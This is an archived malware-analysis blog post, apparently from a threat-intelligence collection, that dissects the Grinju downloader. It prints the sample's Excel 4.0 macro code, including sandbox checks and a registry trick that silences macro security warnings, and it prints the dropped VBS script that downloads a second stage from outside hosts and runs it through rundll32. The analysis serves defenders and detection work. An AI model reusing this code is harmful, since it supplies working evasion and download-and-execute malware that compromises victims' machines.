{
	"id": "7eead36c-8e5a-4a57-99c7-73bc9ba55844",
	"created_at": "2026-04-06T00:11:03.591343Z",
	"updated_at": "2026-04-10T13:12:09.917077Z",
	"deleted_at": null,
	"sha1_hash": "68e254578ffbbaaf6ad627a81fec4f1c55f3371b",
	"title": "Grinju Downloader: Anti-analysis (on steroids) | Part 2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1381950,
	"plain_text": "Grinju Downloader: Anti-analysis (on steroids) | Part 2\r\nBy Vishal Thakur\r\nPublished: 2020-10-06 · Archived: 2026-04-05 20:00:45 UTC\r\nThis malware takes anti-analysis and stealth techniques to a new level\r\nPress enter or click to view image in full size\r\nWe took a look at this malware in the Part 1 of this publication. Now let’s carry on with the analysis and dig\r\ndeeper into the various anti-analysis and stealth-exec features of this malware in Part2.\r\nMalpedia Inventory: https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju\r\nSecondary Macro Code\r\nFirst of all, here’s the entire code that is dumped in the sheet once all the macro functions have been completed.\r\nTake a look at these lines and try to figure out what they are meant to do. Then we’ll take a look at the most\r\nimportant of these briefly before moving on to the next section.\r\n=CLOSE(FALSE)\r\n=FORMULA(LEN(APP.MAXIMIZE())+-459,Sheet1!R18690C129)\r\n=FORMULA(LEN(GET.WINDOW(7))+-131,Sheet1!R18691C129)\r\n=FORMULA(LEN(GET.WINDOW(20))+-893,Sheet1!R18692C129)\r\n=FORMULA(LEN(GET.WINDOW(23)=3)+433,Sheet1!R18693C129)\r\n=FORMULA(LEN(GET.WORKSPACE(31))+864,Sheet1!R18694C129)\r\n=FORMULA(LEN(GET.WORKSPACE(13)\u003e770)+707,Sheet1!R18695C129)\r\n=FORMULA(LEN(GET.WORKSPACE(14)\u003e390)+-407,Sheet1!R18696C129)\r\n=FORMULA(LEN(GET.WORKSPACE(19))+373,Sheet1!R18697C129)\r\n=FORMULA(LEN(GET.WORKSPACE(42))+-476,Sheet1!R18698C129)\r\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))),,GOTO(R18689C129))\r\n=LEFT(GET.WORKSPACE(23),(FIND(\"Roaming\",GET.WORKSPACE(23),1)-1))\u0026\"Local\\Temp\\Nvf.vbs\"\r\n=LEFT(GET.WORKSPACE(23),(FIND(\"Roaming\",GET.WORKSPACE(23),1)-1))\u0026\"Local\\Temp\\Fp70.txt\"\r\n=FOPEN(R18700C129,3)\r\n=FWRITELN(R18702C129,\"On Error Resume Next\")\r\n=FWRITELN(R18702C129,\"Set wjfcRJhw = CreateObject(\"\"WScript.Shell\"\")\")\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 1 of 5\n\n=FWRITELN(R18702C129,\"Set ydvON = CreateObject(\"\"Scripting.FileSystemObject\"\")\")\r\n=FWRITELN(R18702C129,\"Set jPKt = ydvON.CreateTextFile(\"\"\"\u0026R18701C129\u0026\"\"\", True)\")\r\n=FWRITELN(R18702C129,\"T9s=wjfcRJhw.RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Exce\r\nCreateObject(\"\"WScript.Shell\"\")\").RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\r\n=FCLOSE(R18702C129)\r\n=EXEC(\"explorer.exe \"\u0026R18700C129\u0026\"\")\r\n=WHILE(ISERROR(FILES(R18701C129)))\r\n=WAIT(NOW()+\"00:00:01\")\r\n=NEXT()\r\n=FILE.DELETE(R18700C129)\r\n=FOPEN(R18701C129,2)\r\n=FREAD(R18715C129,100)\r\n=FCLOSE(R18715C129)\r\n=FILE.DELETE(R18701C129)\r\n=IF(ISNUMBER(SEARCH(\"1\",R18716C129)),GOTO(R18689C129),)\r\n=IF(ISNUMBER(SEARCH(\"32\",GET.WORKSPACE(1))),GOTO(R4019C240),GOTO(R4046C240))\r\nDepending on the execution flow (we touched on in part 1), selective functions from the above code will be\r\npicked for execution.\r\nAll these functions are picking up values from the sheet (based on formulas, not values) and then forming the VBS\r\ncode that is to be eventually written to the disk as an executable script, which is the final downloader.\r\nThere’s more that these functions do as well, so let’s get into it!\r\nStealth Tactics\r\nThis one creates at text file, the purpose of which is rather sinister ;)\r\n=FWRITELN(R18702C129,\"Set jPKt = ydvON.CreateTextFile(\"\"\"\u0026R18701C129\u0026\"\"\", True)\")\r\nWhat’s happening here is basically a text file being created, using the ‘CreateObject’ function with WScript.Shell,\r\nfrom the values in the sheet at location ‘R18701C129’ and being saved locally in the Temp directory. The text files\r\nhas only one character in it: 1 — which will be used by a different function to carry out something really cheeky.\r\nLet’s take a look.\r\n=FWRITELN(R18702C129,\"T9s=wjfcRJhw.RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Exce\r\nCreateObject(\"\"WScript.Shell\"\")\").RegRead(\"\"HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\r\nThe function above does:\r\n1. Open Registry\r\n2. Go to the Excel Security Warnings hive\r\n3. Take the value from the text file written in the earlier step (the value ‘1’)\r\n4. Write that value (1) to the registry hive for Excel security warnings\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 2 of 5\n\nWhat does it actually do and how exactly is it sinister/cheeky?\r\nGet Vishal Thakur’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nWhen the value of this hive is set to ‘1’, it basically means that ALL macros, from hereon, will run automatically,\r\nwithout any warnings! Remember that ‘Enable Content’ warning at the top that has saved your life as an incident\r\nresponse engineer many times (although, many people still click and enable it)? That warning will simply not\r\nappear in future and all macro functions and VBA will be executed in the background. Hence sinister and cheeky.\r\nPress enter or click to view image in full size\r\nThis malware disables this warning so that macros can be run automatically in stealth mode in the\r\nfuture.\r\nNow let’s look at more functions.\r\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))),,GOTO(R18689C129))\r\nHere you can see that the code runs the GET.WORKSPACE(1) function. This function gets the env that the\r\nmalware is running in. It searches for the text “Windows” in the returned results and if it finds it, it executes the\r\ncode in R18689C129. Basically, it wouldn’t bother running in any other environment.\r\n=IF(ISNUMBER(SEARCH(\"32\",GET.WORKSPACE(1))),GOTO(R4019C240),GOTO(R4046C240))\r\nAbove, you can see another great way of getting the malware execute in different ways, based on the environment\r\nthat it is running in. In the code above, GET.WORKSPACE(1) returns the environment that the malware is\r\nrunning in and if it happens to be 32 bit, it executes the code in R4019C240 and if it is 64 bit, it will go to\r\nR4046C240. Simple but effective.\r\nRest of the functions are pretty straight forward. Writing files, executing them (using explorer.exe), deleting the\r\nfiles once done with them.\r\nHere’s the Script that is dropped (Local\\Temp\\Nvf.vbs):\r\ncNk = \"hxxps://channelmelabd.com/wp-keys.php\"\r\nZN4j82Zg = \"hxxps://ezy.id/wp-keys.php\"\r\nhxSq = \"hxxps://ksuengineering.com/wp-keys.php\"\r\noP744tD = \"hxxps://laserdoctor.com.br/wp-keys.php\"\r\nFmI4 = Array(cNk,ZN4j82Zg,hxSq,oP744tD)\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 3 of 5\n\nDim Yp9: Set Yp9 = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nFunction b41wemtX(data):\r\nYp9.setOption(2) = 13056\r\nYp9.Open \"GET\", data, False\r\nYp9.setRequestHeader \"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"\r\nYp9.Send\r\nb41wemtX = Yp9.Status\r\nEnd Function\r\nFor Each cpm0q7 in FmI4\r\nIf b41wemtX(cpm0q7) = 200 Then\r\nDim t1AEo: Set t1AEo = CreateObject(\"ADODB.Stream\")\r\nt1AEo.Open\r\nt1AEo.Type = 1\r\nt1AEo.Write Yp9.ResponseBody\r\nt1AEo.SaveToFile \"C:\\Users\\Ragnar Lothbrok\\AppData\\Local\\Temp\\ZsQrgSU.html\", 2\r\nt1AEo.Close\r\nExit For\r\nEnd If\r\nNext\r\nAs you can see above, the executable is downloaded and saved as an html file “ZsQrgSU.html”. This is supposed\r\nto be the second-stage malware.\r\nBy the time I got to it, there was nothing to download but there are strong indications that it is a DLL. This\r\nconclusion is based on the fact that there’s another script that is dropped to execute this DLL, which used\r\nrundll32.exe to load the DLL for execution:\r\nSet tyMG = GetObject(\"new:C08AFD90-F2A1-11D1-8455-00A0C91F3880\")\r\ntyMG.Document.Application.ShellExecute \"rundll32.exe\",\"C:\\Users\\Ragnar Lothbrok\\AppData\\Local\\Temp\\Zs\r\nConclusion\r\nSo this was a somewhat selective analysis of the interesting bits in Grinju malware. As you can see, there are a lot\r\nof new tricks in anti-analysis and stealth techniques. We can see malware authors getting creative and digging up\r\nthese old, rarely used functions to bypass analysis and also make our lives harder. The registry trick is really neat\r\nin my opinion, credit where its due. I enjoyed the challenge that this malware presented and it was great to find\r\nthese new ways — now we can tell if other malware tries to use these or similar functions in the future.\r\nI know there are a few things that I’ve skipped over in these two posts, if you need more info or have Qs, hit me\r\non on email (right at the top of this post) or in comments below. The sample and YAYA sig should be available on\r\nmy Malpedia entry.\r\nKeep learning and keep sharing!\r\nUseful links:\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 4 of 5\n\nPress enter or click to view image in full size\r\nSource: https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nhttps://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
	],
	"report_names": [
		"grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
	],
	"threat_actors": [],
	"ts_created_at": 1775434263,
	"ts_updated_at": 1775826729,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.pdf",
		"text": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.txt",
		"img": "https://archive.orkl.eu/68e254578ffbbaaf6ad627a81fec4f1c55f3371b.jpg"
	}
}